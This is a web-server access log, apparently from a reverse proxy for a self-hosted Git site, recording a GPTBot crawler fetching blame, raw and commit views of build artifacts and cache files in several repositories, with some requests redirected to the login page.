"/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26861] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26856] [Gzip 20.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26858] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26857] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10286] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10291] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:28:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:15:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs" +[17/Feb/2026:15:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:15:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2fOpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 21146] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" +[17/Feb/2026:15:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer?language=Python&q=&sort=recentupdate&tab=repositories" [Client 74.7.227.38] [Length 7796] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" +[17/Feb/2026:15:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 9921] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:15:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 11137] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:15:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 10966] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:15:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2findex.html" [Client 74.7.227.38] [Length 27816] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:15:28:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components/About.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/About.tsx" +[17/Feb/2026:15:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components/About.tsx" +[17/Feb/2026:15:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=leastissues&state=open" [Client 74.7.227.38] [Length 8498] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" +[17/Feb/2026:15:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10942] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" +[17/Feb/2026:15:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fbase_library.zip" [Client 74.7.227.38] [Length 17039] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:15:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fbase_library.zip" [Client 74.7.227.38] [Length 18032] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:15:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10883] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:15:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:15:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html?display=source" [Client 74.7.227.38] [Length 15743] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" +[17/Feb/2026:15:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 9931] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:15:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 9933] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" +[17/Feb/2026:15:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 10042] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:15:28:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 10456] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" +[17/Feb/2026:15:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:15:28:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 24373] [Gzip 15.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" +[17/Feb/2026:15:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates/index.html" +[17/Feb/2026:15:28:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:28:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9914] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:28:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:28:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache?display=source" [Client 74.7.227.38] [Length 12318] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:15:28:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=mostcomplete&state=open" 